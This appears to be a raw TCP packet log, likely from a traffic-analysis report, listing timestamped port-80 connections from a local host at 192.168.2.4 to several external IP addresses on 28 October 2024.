                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:03.009433031 CET804979718.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:03.009537935 CET4979780192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:03.009713888 CET4979780192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:03.009752035 CET4979780192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:03.015271902 CET804979718.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:03.015765905 CET804979718.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:03.682817936 CET804979718.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:03.683049917 CET4979780192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:03.689579010 CET804979718.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:03.689719915 CET4979780192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:03.920964003 CET4980380192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:03.926429987 CET804980313.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:03.926645041 CET4980380192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:03.926799059 CET4980380192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:03.926824093 CET4980380192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:03.932404041 CET804980313.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:03.932677031 CET804980313.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:05.384819984 CET804980313.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:05.392262936 CET4980380192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:05.398359060 CET804980313.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:05.398433924 CET4980380192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:05.585799932 CET4981180192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:05.591166973 CET804981113.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:05.591278076 CET4981180192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:05.593991995 CET4981180192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:05.594240904 CET4981180192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:05.599289894 CET804981113.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:05.599626064 CET804981113.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:07.029905081 CET804981113.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:07.033582926 CET4981180192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:07.039966106 CET804981113.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:07.043188095 CET4981180192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:07.491463900 CET4982480192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:07.497747898 CET804982434.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:07.497847080 CET4982480192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:07.498008013 CET4982480192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:07.498025894 CET4982480192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:07.503942966 CET804982434.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:07.504311085 CET804982434.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:08.320926905 CET804982434.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:08.321136951 CET4982480192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:08.327111959 CET804982434.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:08.327258110 CET4982480192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:08.887581110 CET4983080192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:08.893074989 CET804983047.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:08.893163919 CET4983080192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:08.893642902 CET4983080192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:08.893660069 CET4983080192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:08.899038076 CET804983047.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:08.899068117 CET804983047.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:10.346488953 CET804983047.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:10.350013018 CET4983080192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:10.355915070 CET804983047.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:10.356494904 CET4983080192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:10.744441986 CET4983980192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:10.749838114 CET804983913.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:10.749946117 CET4983980192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:10.754662037 CET4983980192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:10.754662037 CET4983980192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:10.760041952 CET804983913.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:10.760061026 CET804983913.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:12.195576906 CET804983913.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:12.197515965 CET4983980192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:12.203365088 CET804983913.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:12.203443050 CET4983980192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:12.588362932 CET4985080192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:12.594091892 CET804985034.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:12.594398975 CET4985080192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:12.594521999 CET4985080192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:12.594521999 CET4985080192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:12.599940062 CET804985034.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:12.599972010 CET804985034.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:13.437880993 CET804985034.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:13.481380939 CET4985080192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:13.498076916 CET4985080192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:13.503761053 CET804985034.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:13.503854990 CET4985080192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:14.034213066 CET4985780192.168.2.43.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:14.039508104 CET80498573.94.10.34192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:14.039571047 CET4985780192.168.2.43.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:14.039732933 CET4985780192.168.2.43.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:14.039758921 CET4985780192.168.2.43.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:14.045017004 CET80498573.94.10.34192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:14.045028925 CET80498573.94.10.34192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:14.703419924 CET80498573.94.10.34192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:14.703598022 CET4985780192.168.2.43.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:14.709664106 CET80498573.94.10.34192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:14.709724903 CET4985780192.168.2.43.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:15.064135075 CET4986680192.168.2.418.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:15.069546938 CET804986618.246.231.120192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:15.069627047 CET4986680192.168.2.418.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:15.069752932 CET4986680192.168.2.418.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:15.069777966 CET4986680192.168.2.418.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:15.075110912 CET804986618.246.231.120192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:15.075202942 CET804986618.246.231.120192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:15.892615080 CET804986618.246.231.120192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:15.892800093 CET4986680192.168.2.418.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:15.898761988 CET804986618.246.231.120192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:15.898822069 CET4986680192.168.2.418.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:16.096292973 CET4987380192.168.2.43.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:16.102375031 CET80498733.254.94.185192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:16.102459908 CET4987380192.168.2.43.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:16.102674961 CET4987380192.168.2.43.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:16.102737904 CET4987380192.168.2.43.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:16.108623028 CET80498733.254.94.185192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:16.108969927 CET80498733.254.94.185192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:17.058840036 CET80498733.254.94.185192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:17.059036016 CET4987380192.168.2.43.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:17.064872980 CET80498733.254.94.185192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:17.065207958 CET4987380192.168.2.43.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:17.609294891 CET4988180192.168.2.485.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:17.863715887 CET804988185.214.228.140192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:17.863811016 CET4988180192.168.2.485.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:17.865041971 CET4988180192.168.2.485.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:17.865092993 CET4988180192.168.2.485.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:17.870496988 CET804988185.214.228.140192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:17.870570898 CET804988185.214.228.140192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:18.749891043 CET804988185.214.228.140192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:18.750019073 CET804988185.214.228.140192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:18.750401974 CET4988180192.168.2.485.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:18.967185974 CET4988980192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:18.972676992 CET804988947.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:18.972781897 CET4988980192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:18.973161936 CET4988980192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:18.973196983 CET4988980192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:18.978617907 CET804988947.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:18.978632927 CET804988947.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:20.549344063 CET804988947.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:20.550820112 CET4988980192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:20.556490898 CET804988947.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:20.556545019 CET4988980192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:20.594191074 CET4989880192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:20.599899054 CET804989834.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:20.600442886 CET4989880192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:20.600442886 CET4989880192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:20.600442886 CET4989880192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:20.605858088 CET804989834.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:20.605870962 CET804989834.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:21.340909004 CET4989880192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:21.353907108 CET4990480192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:21.359503984 CET804990434.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:21.359574080 CET4990480192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:21.369923115 CET4990480192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:21.369949102 CET4990480192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:21.375405073 CET804990434.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:21.375422001 CET804990434.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:22.198882103 CET804990434.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:22.200900078 CET4990480192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:22.206600904 CET804990434.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:22.206696987 CET4990480192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:22.221721888 CET4990980192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:22.227113008 CET804990947.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:22.227178097 CET4990980192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:22.230040073 CET4990980192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:22.230063915 CET4990980192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:22.235426903 CET804990947.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:22.235455036 CET804990947.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:23.677093983 CET804990947.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:23.681915045 CET4990980192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:23.687647104 CET804990947.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:23.687702894 CET4990980192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:23.806499004 CET4991780192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:23.811944008 CET804991718.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:23.812015057 CET4991780192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:23.817389011 CET4991780192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:23.817421913 CET4991780192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:23.822895050 CET804991718.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:23.822917938 CET804991718.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:24.474181890 CET804991718.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:24.474410057 CET4991780192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:24.480592966 CET804991718.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:24.480657101 CET4991780192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:24.501178026 CET4992180192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:24.506570101 CET804992113.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:24.506648064 CET4992180192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:24.507339954 CET4992180192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:24.507339954 CET4992180192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:24.512667894 CET804992113.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:24.512681007 CET804992113.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:25.341908932 CET4992180192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:25.345344067 CET4992680192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:25.350828886 CET804992613.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:25.350945950 CET4992680192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:25.351178885 CET4992680192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:25.351222038 CET4992680192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:25.356529951 CET804992613.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:25.356545925 CET804992613.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:25.528299093 CET8049766165.160.15.20192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:25.528772116 CET4976680192.168.2.4165.160.15.20
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:25.528855085 CET4976680192.168.2.4165.160.15.20
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:25.534323931 CET8049766165.160.15.20192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:26.774348021 CET804992613.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:26.774595976 CET4992680192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:26.781668901 CET804992613.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:26.781740904 CET4992680192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:26.793067932 CET4993580192.168.2.434.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:26.798644066 CET804993534.246.200.160192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:26.798785925 CET4993580192.168.2.434.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:26.799005985 CET4993580192.168.2.434.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:26.799040079 CET4993580192.168.2.434.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:26.806046963 CET804993534.246.200.160192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:26.806190968 CET804993534.246.200.160192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:27.774780989 CET804993534.246.200.160192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:27.775036097 CET4993580192.168.2.434.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:27.780921936 CET804993534.246.200.160192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:27.781048059 CET4993580192.168.2.434.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:27.790214062 CET4994180192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:27.795562029 CET804994118.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:27.795643091 CET4994180192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:27.795793056 CET4994180192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:27.795804977 CET4994180192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:27.803636074 CET804994118.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:27.803647041 CET804994118.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:29.232007980 CET804994118.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:29.250405073 CET4994180192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:29.257112026 CET804994118.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:29.257174015 CET4994180192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:29.283086061 CET4995280192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:29.288520098 CET804995213.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:29.288605928 CET4995280192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:29.288954973 CET4995280192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:29.288985968 CET4995280192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:29.294871092 CET804995213.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:29.294910908 CET804995213.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:30.746256113 CET804995213.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:30.777173042 CET4995280192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:30.783252954 CET804995213.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:30.783318043 CET4995280192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:31.010749102 CET4996180192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:31.016396999 CET804996118.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:31.016474009 CET4996180192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:31.016619921 CET4996180192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:31.016639948 CET4996180192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:31.022010088 CET804996118.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:31.024456024 CET804996118.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:31.679272890 CET804996118.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:31.679438114 CET4996180192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:31.687042952 CET804996118.208.156.248192.168.2.4
